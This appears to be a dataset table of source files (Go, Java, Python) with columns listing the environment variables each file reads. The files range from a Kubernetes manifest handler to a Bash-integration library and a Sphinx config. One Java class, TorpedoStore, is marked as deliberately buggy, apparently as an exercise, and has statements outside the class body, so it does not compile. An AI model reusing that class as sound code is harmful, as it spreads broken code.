filename
stringlengths 4
198
| content
stringlengths 25
939k
| environment
list | variablearg
list | constarg
list | variableargjson
stringclasses 1
value | constargjson
stringlengths 2
3.9k
| lang
stringclasses 3
values | constargcount
float64 0
129
⌀ | variableargcount
float64 0
0
⌀ | sentence
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|
terraform/azurerm/vendor/github.com/hashicorp/terraform-provider-azurerm/internal/features/kubernetes_config_sensitivity.go | package features
import (
"os"
"strings"
)
func KubeConfigsAreSensitive() bool {
return strings.EqualFold(os.Getenv("ARM_AKS_KUBE_CONFIGS_SENSITIVE"), "true")
}
| [
"\"ARM_AKS_KUBE_CONFIGS_SENSITIVE\""
]
| []
| [
"ARM_AKS_KUBE_CONFIGS_SENSITIVE"
]
| [] | ["ARM_AKS_KUBE_CONFIGS_SENSITIVE"] | go | 1 | 0 | |
litmus-portal/graphql-server/pkg/handlers/file_handler.go | package handlers
import (
"errors"
"log"
"net/http"
"os"
"github.com/gorilla/mux"
"github.com/litmuschaos/litmus/litmus-portal/graphql-server/pkg/cluster"
dbOperationsCluster "github.com/litmuschaos/litmus/litmus-portal/graphql-server/pkg/database/mongodb/cluster"
"github.com/litmuschaos/litmus/litmus-portal/graphql-server/pkg/k8s"
"github.com/litmuschaos/litmus/litmus-portal/graphql-server/pkg/types"
"github.com/litmuschaos/litmus/litmus-portal/graphql-server/utils"
)
const (
clusterScope string = "cluster"
namespaceScope string = "namespace"
)
var subscriberConfiguration = &types.SubscriberConfigurationVars{
AgentNamespace: os.Getenv("AGENT_NAMESPACE"),
AgentScope: os.Getenv("AGENT_SCOPE"),
AgentDeployments: os.Getenv("AGENT_DEPLOYMENTS"),
SubscriberImage: os.Getenv("SUBSCRIBER_IMAGE"),
EventTrackerImage: os.Getenv("EVENT_TRACKER_IMAGE"),
WorkflowControllerImage: os.Getenv("ARGO_WORKFLOW_CONTROLLER_IMAGE"),
ChaosOperatorImage: os.Getenv("LITMUS_CHAOS_OPERATOR_IMAGE"),
WorkflowExecutorImage: os.Getenv("ARGO_WORKFLOW_EXECUTOR_IMAGE"),
ChaosRunnerImage: os.Getenv("LITMUS_CHAOS_RUNNER_IMAGE"),
ChaosExporterImage: os.Getenv("LITMUS_CHAOS_EXPORTER_IMAGE"),
ContainerRuntimeExecutor: os.Getenv("CONTAINER_RUNTIME_EXECUTOR"),
Version: os.Getenv("VERSION"),
}
// FileHandler dynamically generates the manifest file and sends it as a response
func FileHandler(w http.ResponseWriter, r *http.Request) {
var (
vars = mux.Vars(r)
token = vars["key"]
)
response, statusCode, err := GetManifest(token)
if err != nil {
log.Print("error: ", err)
utils.WriteHeaders(&w, statusCode)
}
utils.WriteHeaders(&w, statusCode)
w.Write(response)
}
func GetManifest(token string) ([]byte, int, error) {
id, err := cluster.ClusterValidateJWT(token)
if err != nil {
return nil, 404, err
}
reqCluster, err := dbOperationsCluster.GetCluster(id)
if err != nil {
return nil, 500, err
}
scope := os.Getenv("PORTAL_SCOPE")
if scope == clusterScope {
subscriberConfiguration.GQLServerURI, err = k8s.GetServerEndpoint()
if err != nil {
return nil, 500, err
}
} else if scope == namespaceScope {
subscriberConfiguration.GQLServerURI = os.Getenv("PORTAL_ENDPOINT") + "/query"
subscriberConfiguration.TLSCert = os.Getenv("TLS_CERT_B64")
}
secretName := os.Getenv("TLS_SECRET_NAME")
if scope == clusterScope && secretName != "" {
subscriberConfiguration.TLSCert, err = k8s.GetTLSCert(secretName)
if err != nil {
return nil, 500, err
}
}
if !reqCluster.IsRegistered {
var respData []byte
if reqCluster.AgentScope == "cluster" {
respData, err = utils.ManifestParser(reqCluster, "manifests/cluster", subscriberConfiguration)
} else if reqCluster.AgentScope == "namespace" {
respData, err = utils.ManifestParser(reqCluster, "manifests/namespace", subscriberConfiguration)
} else {
log.Print("ERROR- AGENT SCOPE NOT SELECTED!")
}
if err != nil {
return nil, 500, err
}
return respData, 200, nil
} else {
return []byte("Cluster is already registered"), 409, nil
}
}
// Returns manifest for a given cluster
func GetManifestWithClusterID(id string, key string) ([]byte, error) {
reqCluster, err := dbOperationsCluster.GetCluster(id)
if err != nil {
return nil, err
}
// Checking if cluster with given clusterID and accesskey is present
if reqCluster.AccessKey != key {
return nil, errors.New("Invalid access key")
}
scope := os.Getenv("PORTAL_SCOPE")
if scope == clusterScope {
subscriberConfiguration.GQLServerURI, err = k8s.GetServerEndpoint()
if err != nil {
return nil, err
}
} else if scope == namespaceScope {
subscriberConfiguration.GQLServerURI = os.Getenv("PORTAL_ENDPOINT") + "/query"
subscriberConfiguration.TLSCert = os.Getenv("TLS_CERT_B64")
}
secretName := os.Getenv("TLS_SECRET_NAME")
if scope == clusterScope && secretName != "" {
subscriberConfiguration.TLSCert, err = k8s.GetTLSCert(secretName)
if err != nil {
return nil, err
}
}
var respData []byte
if reqCluster.AgentScope == clusterScope {
respData, err = utils.ManifestParser(reqCluster, "manifests/cluster", subscriberConfiguration)
} else if reqCluster.AgentScope == namespaceScope {
respData, err = utils.ManifestParser(reqCluster, "manifests/namespace", subscriberConfiguration)
} else {
log.Print("ERROR- AGENT SCOPE NOT SELECTED!")
}
if err != nil {
return nil, err
}
return respData, nil
}
| [
"\"AGENT_NAMESPACE\"",
"\"AGENT_SCOPE\"",
"\"AGENT_DEPLOYMENTS\"",
"\"SUBSCRIBER_IMAGE\"",
"\"EVENT_TRACKER_IMAGE\"",
"\"ARGO_WORKFLOW_CONTROLLER_IMAGE\"",
"\"LITMUS_CHAOS_OPERATOR_IMAGE\"",
"\"ARGO_WORKFLOW_EXECUTOR_IMAGE\"",
"\"LITMUS_CHAOS_RUNNER_IMAGE\"",
"\"LITMUS_CHAOS_EXPORTER_IMAGE\"",
"\"CONTAINER_RUNTIME_EXECUTOR\"",
"\"VERSION\"",
"\"PORTAL_SCOPE\"",
"\"PORTAL_ENDPOINT\"",
"\"TLS_CERT_B64\"",
"\"TLS_SECRET_NAME\"",
"\"PORTAL_SCOPE\"",
"\"PORTAL_ENDPOINT\"",
"\"TLS_CERT_B64\"",
"\"TLS_SECRET_NAME\""
]
| []
| [
"AGENT_SCOPE",
"AGENT_NAMESPACE",
"SUBSCRIBER_IMAGE",
"AGENT_DEPLOYMENTS",
"TLS_CERT_B64",
"VERSION",
"TLS_SECRET_NAME",
"LITMUS_CHAOS_EXPORTER_IMAGE",
"CONTAINER_RUNTIME_EXECUTOR",
"ARGO_WORKFLOW_CONTROLLER_IMAGE",
"LITMUS_CHAOS_OPERATOR_IMAGE",
"PORTAL_SCOPE",
"LITMUS_CHAOS_RUNNER_IMAGE",
"EVENT_TRACKER_IMAGE",
"ARGO_WORKFLOW_EXECUTOR_IMAGE",
"PORTAL_ENDPOINT"
]
| [] | ["AGENT_SCOPE", "AGENT_NAMESPACE", "SUBSCRIBER_IMAGE", "AGENT_DEPLOYMENTS", "TLS_CERT_B64", "VERSION", "TLS_SECRET_NAME", "LITMUS_CHAOS_EXPORTER_IMAGE", "CONTAINER_RUNTIME_EXECUTOR", "ARGO_WORKFLOW_CONTROLLER_IMAGE", "LITMUS_CHAOS_OPERATOR_IMAGE", "PORTAL_SCOPE", "LITMUS_CHAOS_RUNNER_IMAGE", "EVENT_TRACKER_IMAGE", "ARGO_WORKFLOW_EXECUTOR_IMAGE", "PORTAL_ENDPOINT"] | go | 16 | 0 | |
lvmd/lvservice_test.go | package lvmd
import (
"context"
"os"
"os/exec"
"testing"
"github.com/cybozu-go/topolvm/lvmd/command"
"github.com/cybozu-go/topolvm/lvmd/proto"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
)
func TestLVService(t *testing.T) {
uid := os.Getuid()
if uid != 0 {
t.Skip("run as root")
}
circleci := os.Getenv("CIRCLECI") == "true"
if circleci {
executorType := os.Getenv("CIRCLECI_EXECUTOR")
if executorType != "machine" {
t.Skip("run on machine executor")
}
}
vgName := "test_lvservice"
loop, err := MakeLoopbackVG(vgName)
if err != nil {
t.Fatal(err)
}
defer CleanLoopbackVG(loop, vgName)
vg, err := command.FindVolumeGroup(vgName)
if err != nil {
t.Fatal(err)
}
var count int
notifier := func() {
count++
}
lvService := NewLVService(vg, notifier)
res, err := lvService.CreateLV(context.Background(), &proto.CreateLVRequest{
Name: "test1",
SizeGb: 1,
Tags: []string{"testtag1", "testtag2"},
})
if err != nil {
t.Fatal(err)
}
if count != 1 {
t.Errorf("is not notified: %d", count)
}
if res.GetVolume().GetName() != "test1" {
t.Errorf(`res.Volume.Name != "test1": %s`, res.GetVolume().GetName())
}
if res.GetVolume().GetSizeGb() != 1 {
t.Errorf(`res.Volume.SizeGb != 1: %d`, res.GetVolume().GetSizeGb())
}
err = exec.Command("lvs", vg.Name()+"/test1").Run()
if err != nil {
t.Error("failed to create logical volume")
}
lv, err := vg.FindVolume("test1")
if err != nil {
t.Fatal(err)
}
if lv.Tags()[0] != "testtag1" {
t.Errorf(`testtag1 not present on volume`)
}
if lv.Tags()[1] != "testtag2" {
t.Errorf(`testtag1 not present on volume`)
}
_, err = lvService.CreateLV(context.Background(), &proto.CreateLVRequest{
Name: "test2",
SizeGb: 3,
})
code := status.Code(err)
if code != codes.ResourceExhausted {
t.Errorf(`code is not codes.ResouceExhausted: %s`, code)
}
if count != 1 {
t.Errorf("unexpected count: %d", count)
}
_, err = lvService.ResizeLV(context.Background(), &proto.ResizeLVRequest{
Name: "test1",
SizeGb: 2,
})
if err != nil {
t.Fatal(err)
}
if count != 2 {
t.Errorf("unexpected count: %d", count)
}
lv, err = vg.FindVolume("test1")
if err != nil {
t.Fatal(err)
}
if lv.Size() != (2 << 30) {
t.Errorf(`does not match size 2: %d`, lv.Size()>>30)
}
_, err = lvService.ResizeLV(context.Background(), &proto.ResizeLVRequest{
Name: "test1",
SizeGb: 5,
})
code = status.Code(err)
if code != codes.ResourceExhausted {
t.Errorf(`code is not codes.ResouceExhausted: %s`, code)
}
if count != 2 {
t.Errorf("unexpected count: %d", count)
}
_, err = lvService.RemoveLV(context.Background(), &proto.RemoveLVRequest{
Name: "test1",
})
if err != nil {
t.Error(err)
}
if count != 3 {
t.Errorf("unexpected count: %d", count)
}
_, err = vg.FindVolume("test1")
if err != command.ErrNotFound {
t.Error("unexpected error: ", err)
}
}
| [
"\"CIRCLECI\"",
"\"CIRCLECI_EXECUTOR\""
]
| []
| [
"CIRCLECI_EXECUTOR",
"CIRCLECI"
]
| [] | ["CIRCLECI_EXECUTOR", "CIRCLECI"] | go | 2 | 0 | |
src/main/java/hu/bme/mit/spaceship/TorpedoStore.java | package hu.bme.mit.spaceship;
import java.util.Random;
/**
* Class storing and managing the torpedoes of a ship
*
* (Deliberately contains bugs.)
*/
Random generator = new Random();
double r = generator.nextDouble();
public class TorpedoStore {
// rate of failing to fire torpedos [0.0, 1.0]
private double FAILURE_RATE = 0.0; //NOSONAR
private int torpedoCount = 0;
public TorpedoStore(int numberOfTorpedos){
this.torpedoCount = numberOfTorpedos;
// update failure rate if it was specified in an environment variable
String failureEnv = System.getenv("IVT_RATE");
if (failureEnv != null){
try {
FAILURE_RATE = Double.parseDouble(failureEnv);
} catch (NumberFormatException nfe) {
FAILURE_RATE = 0.0;
}
}
}
public boolean fire(int numberOfTorpedos){
if(numberOfTorpedos < 1 || numberOfTorpedos > this.torpedoCount){
throw new IllegalArgumentException("numberOfTorpedos");
}
boolean success = false;
// simulate random overheating of the launcher bay which prevents firing
if (r >= FAILURE_RATE) {
// successful firing
this.torpedoCount -= numberOfTorpedos;
success = true;
} else {
// simulated failure
success = false;
}
return success;
}
public boolean isEmpty(){
return this.torpedoCount <= 0;
}
public int getTorpedoCount() {
return this.torpedoCount;
}
}
| [
"\"IVT_RATE\""
]
| []
| [
"IVT_RATE"
]
| [] | ["IVT_RATE"] | java | 1 | 0 | |
test/TEX/PDFTEX.py | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
r"""
Validate that we can set the PDFTEX string to our own utility, that
the produced .dvi, .aux and .log files get removed by the -c option,
and that we can use this to wrap calls to the real latex utility.
"""
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('mypdftex.py', r"""
import sys
import os
import getopt
cmd_opts, arg = getopt.getopt(sys.argv[2:], 'i:r:', [])
base_name = os.path.splitext(arg[0])[0]
with open(arg[0], 'r') as ifp:
with open(base_name+'.pdf', 'w') as pdf_file, \
open(base_name+'.aux', 'w') as aux_file, \
open(base_name+'.log', 'w') as log_file:
for l in ifp.readlines():
if l[0] != '\\':
pdf_file.write(l)
aux_file.write(l)
log_file.write(l)
sys.exit(0)
""")
test.write('SConstruct', """
env = Environment(PDFTEX = r'%(_python_)s mypdftex.py', tools=['pdftex'])
env.PDF(target = 'test.pdf', source = 'test.tex')
""" % locals())
test.write('test.tex', r"""This is a test.
\end
""")
test.run(arguments = 'test.pdf')
test.must_exist('test.pdf')
test.must_exist('test.aux')
test.must_exist('test.log')
test.run(arguments = '-c test.pdf')
test.must_not_exist('test.pdf')
test.must_not_exist('test.aux')
test.must_not_exist('test.log')
pdftex = test.where_is('pdftex')
if pdftex:
test.file_fixture('wrapper.py')
test.write('SConstruct', """
import os
ENV = { 'PATH' : os.environ['PATH'] }
foo = Environment(ENV = ENV)
pdftex = foo.Dictionary('PDFTEX')
bar = Environment(ENV = ENV, PDFTEX = r'%(_python_)s wrapper.py ' + pdftex)
foo.PDF(target = 'foo.pdf', source = 'foo.tex')
bar.PDF(target = 'bar', source = 'bar.tex')
""" % locals())
tex = r"""
This is the %s TeX file.
\end
"""
test.write('foo.tex', tex % 'foo.tex')
test.write('bar.tex', tex % 'bar.tex')
test.run(arguments = 'foo.pdf', stderr = None)
test.must_not_exist('wrapper.out')
test.must_exist('foo.pdf')
test.run(arguments = 'bar.pdf', stderr = None)
test.must_exist('wrapper.out')
test.must_exist('bar.pdf')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| []
| []
| [
"PATH"
]
| [] | ["PATH"] | python | 1 | 0 | |
tests/settings.py | import os
TEST_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'tests')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'price_monitor',
]
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(TEST_DIR, 'static')
SECRET_KEY = os.environ['SECRET_KEY']
ROOT_URLCONF = 'price_monitor.urls'
PRICE_MONITOR_AMAZON_PRODUCT_API_REGION = 'DE'
PRICE_MONITOR_AMAZON_PRODUCT_API_ASSOC_TAG = 'sample-assoc-tag'
| []
| []
| [
"SECRET_KEY"
]
| [] | ["SECRET_KEY"] | python | 1 | 0 | |
basher.go | // Package basher provides an API for running and integrating with Bash from Go
package basher
import (
"io"
"io/ioutil"
"log"
"os"
"os/exec"
"os/signal"
"strings"
"sync"
"syscall"
"github.com/kardianos/osext"
"github.com/mitchellh/go-homedir"
)
func exitStatus(err error) (int, error) {
if err != nil {
if exiterr, ok := err.(*exec.ExitError); ok {
// There is no platform independent way to retrieve
// the exit code, but the following will work on Unix
if status, ok := exiterr.Sys().(syscall.WaitStatus); ok {
return int(status.ExitStatus()), nil
}
}
return 0, err
}
return 0, nil
}
// Application sets up a common entrypoint for a Bash application that
// funcs : exported Go functions.
// sourcedScripts : some bash scripts to sourced
// command : bash command to execute -- arg passed on the command line will be passed to the command
// loaderSourcedScripts : loader for sourced bash file - if nil, will use ioutil.ReadFile - Use 'Asset' for embedded scripts
// loaderBash : loader for binary bash file - if nil, will try to autodetect binary (by using BASH_PATH or 'which bash') - Use 'RestoreAsset' for embedded bash
// copyEnv : import current shell env into context
// It uses the DEBUG environment variable to set debug on the Context,
func Application(
funcs map[string]func([]string),
sourcedScripts []string,
command string,
loaderSourcedScripts func(string) ([]byte, error),
loaderBash func(string, string) error,
copyEnv bool) {
var bashPath string
if loaderBash != nil {
bashDir, err := homedir.Expand("~/.basher")
if err != nil {
log.Fatal(err, "1")
}
bashPath = bashDir + "/bash"
if _, err := os.Stat(bashPath); os.IsNotExist(err) {
err = loaderBash(bashDir, "bash")
if err != nil {
log.Fatal(err, "1")
}
}
} else {
bashPath = findSystemBashPath()
}
bash, err := NewContext(bashPath, os.Getenv("DEBUG") != "")
if err != nil {
log.Fatal(err)
}
for name, fn := range funcs {
bash.ExportFunc(name, fn)
}
if bash.HandleFuncs(os.Args) {
os.Exit(0)
}
for _, script := range sourcedScripts {
bash.Source(script, loaderSourcedScripts)
}
if copyEnv {
bash.CopyEnv()
}
status, err := bash.Run(command, os.Args[1:])
if err != nil {
log.Fatal(err)
}
os.Exit(status)
}
// determine where is bash in the current system
// use BASH_PATH env var to force bash path
// or use 'which bash' to locate bash on system
func findSystemBashPath() string {
var bashPath string
if os.Getenv("BASH_PATH") != "" {
bashPath = os.Getenv("BASH_PATH")
} else {
output, err := exec.Command("which", "bash").CombinedOutput()
if err == nil {
bashPath = string(output)
}
}
return strings.TrimSpace(bashPath)
}
// A Context is an instance of a Bash interpreter and environment, including
// sourced scripts, environment variables, and embedded Go functions
type Context struct {
sync.Mutex
// Debug simply leaves the generated BASH_ENV file produced
// from each Run call of this Context for debugging.
Debug bool
// BashPath is the path to the Bash executable to be used by Run
BashPath string
// SelfPath is set by NewContext to be the current executable path.
// It's used to call back into the calling Go process to run exported
// functions.
SelfPath string
// The io.Reader given to Bash for STDIN
Stdin io.Reader
// The io.Writer given to Bash for STDOUT
Stdout io.Writer
// The io.Writer given to Bash for STDERR
Stderr io.Writer
vars []string
scripts [][]byte
funcs map[string]func([]string)
}
// Creates and initializes a new Context that will use the given Bash executable.
// The debug mode will leave the produced temporary BASH_ENV file for inspection.
func NewContext(bashpath string, debug bool) (*Context, error) {
executable, err := osext.Executable()
if err != nil {
return nil, err
}
return &Context{
Debug: debug,
BashPath: bashpath,
SelfPath: executable,
Stdin: os.Stdin,
Stdout: os.Stdout,
Stderr: os.Stderr,
scripts: make([][]byte, 0),
vars: make([]string, 0),
funcs: make(map[string]func([]string)),
}, nil
}
// Copies the current environment variables into the Context
func (c *Context) CopyEnv() {
c.Lock()
defer c.Unlock()
c.vars = append(c.vars, os.Environ()...)
}
// Adds a shell script to the Context environment. The loader argument can be nil
// which means it will use ioutil.Readfile and load from disk, but it exists so you
// can use the Asset function produced by go-bindata when including script files in
// your Go binary. Calls to Source adds files to the environment in order.
func (c *Context) Source(filepath string, loader func(string) ([]byte, error)) error {
if loader == nil {
loader = ioutil.ReadFile
}
data, err := loader(filepath)
if err != nil {
return err
}
c.Lock()
defer c.Unlock()
c.scripts = append(c.scripts, data)
return nil
}
// Adds an environment variable to the Context
func (c *Context) Export(name string, value string) {
c.Lock()
defer c.Unlock()
c.vars = append(c.vars, name+"="+value)
}
// Registers a function with the Context that will produce a Bash function in the environment
// that calls back into your executable triggering the function defined as fn.
func (c *Context) ExportFunc(name string, fn func([]string)) {
c.Lock()
defer c.Unlock()
c.funcs[name] = fn
}
// Expects your os.Args to parse and handle any callbacks to Go functions registered with
// ExportFunc. You normally call this at the beginning of your program. If a registered
// function is found and handled, HandleFuncs will exit with the appropriate exit code for you.
func (c *Context) HandleFuncs(args []string) bool {
for i, arg := range args {
if arg == ":::" && len(args) > i+1 {
c.Lock()
defer c.Unlock()
for cmd := range c.funcs {
if cmd == args[i+1] {
c.funcs[cmd](args[i+2:])
return true
}
}
return false
}
}
return false
}
func (c *Context) buildEnvfile() (string, error) {
file, err := ioutil.TempFile(os.TempDir(), "bashenv.")
if err != nil {
return "", err
}
defer file.Close()
// variables
file.Write([]byte("unset BASH_ENV\n")) // unset for future calls to bash
file.Write([]byte("export SELF=" + os.Args[0] + "\n"))
file.Write([]byte("export SELF_EXECUTABLE='" + c.SelfPath + "'\n"))
for _, kvp := range c.vars {
file.Write([]byte("export " + strings.Replace(
strings.Replace(kvp, "'", "\\'", -1), "=", "=$'", 1) + "'\n"))
}
// functions
for cmd := range c.funcs {
file.Write([]byte(cmd + "() { $SELF_EXECUTABLE ::: " + cmd + " \"$@\"; }\n"))
}
// scripts
for _, data := range c.scripts {
file.Write(append(data, '\n'))
}
return file.Name(), nil
}
// Runs a command in Bash from this Context. With each call, a temporary file
// is generated used as BASH_ENV when calling Bash that includes all variables,
// sourced scripts, and exported functions from the Context. Standard I/O by
// default is attached to the calling process I/O. You can change this by setting
// the Stdout, Stderr, Stdin variables of the Context.
func (c *Context) Run(command string, args []string) (int, error) {
c.Lock()
defer c.Unlock()
envfile, err := c.buildEnvfile()
if err != nil {
return 0, err
}
if !c.Debug {
defer os.Remove(envfile)
}
argstring := ""
for _, arg := range args {
argstring = argstring + " '" + strings.Replace(arg, "'", "'\\''", -1) + "'"
}
signals := make(chan os.Signal, 1)
signal.Notify(signals)
cmd := exec.Command(c.BashPath, "-c", command+argstring)
cmd.Env = []string{"BASH_ENV=" + envfile}
cmd.Stdin = c.Stdin
cmd.Stdout = c.Stdout
cmd.Stderr = c.Stderr
//cmd.Start()
if err2 := cmd.Start(); err2 != nil {
return 0, err2
}
go func() {
for sig := range signals {
cmd.Process.Signal(sig)
if cmd.ProcessState != nil && !cmd.ProcessState.Exited() {
cmd.Process.Signal(sig)
}
}
}()
return exitStatus(cmd.Wait())
}
| [
"\"DEBUG\"",
"\"BASH_PATH\"",
"\"BASH_PATH\""
]
| []
| [
"BASH_PATH",
"DEBUG"
]
| [] | ["BASH_PATH", "DEBUG"] | go | 2 | 0 | |
docs/conf.py | # -*- coding: utf-8 -*-
#
# simplekv documentation build configuration file, created by
# sphinx-quickstart on Tue May 10 09:07:13 2011.
#
# This file is execfile()d with the current directory set to its containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
sys.path.append('../')
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if on_rtd:
html_theme = 'alabaster'
else:
import sphinx_readable_theme
html_theme = 'readable'
html_theme_path = [sphinx_readable_theme.get_html_theme_path()]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.todo',
'sphinx.ext.coverage', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'simplekv'
copyright = u'2011, Marc Brinkmann'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.14.1'
# The full version, including alpha/beta/rc tags.
release = '0.14.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output -------------------------------------------------
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'simplekvdoc'
# -- Options for LaTeX output ------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'simplekv.tex', u'simplekv Documentation',
u'Marc Brinkmann', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
intersphinx_mapping = {'http://docs.python.org/': None,
'http://docs.pythonboto.org/en/latest/': None,
'http://sendapatch.se/projects/pylibmc/': None,
'http://www.sqlalchemy.org/docs/': None,
'http://redis-py.readthedocs.org/en/latest/': None}
| []
| []
| [
"READTHEDOCS"
]
| [] | ["READTHEDOCS"] | python | 1 | 0 | |
.venv/lib/python3.8/site-packages/pyparsing/core.py | #
# core.py
#
import os
from typing import (
Optional as OptionalType,
Iterable as IterableType,
Union,
Callable,
Any,
Generator,
Tuple,
List,
TextIO,
Set,
Dict as DictType,
)
from abc import ABC, abstractmethod
from enum import Enum
import string
import copy
import warnings
import re
import sre_constants
import sys
from collections.abc import Iterable
import traceback
import types
from operator import itemgetter
from functools import wraps
from threading import RLock
from pathlib import Path
from .util import (
_FifoCache,
_UnboundedCache,
__config_flags,
_collapse_string_to_ranges,
_escape_regex_range_chars,
_bslash,
_flatten,
LRUMemo as _LRUMemo,
UnboundedMemo as _UnboundedMemo,
)
from .exceptions import *
from .actions import *
from .results import ParseResults, _ParseResultsWithOffset
from .unicode import pyparsing_unicode
_MAX_INT = sys.maxsize
str_type: Tuple[type, ...] = (str, bytes)
#
# Copyright (c) 2003-2021 Paul T. McGuire
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
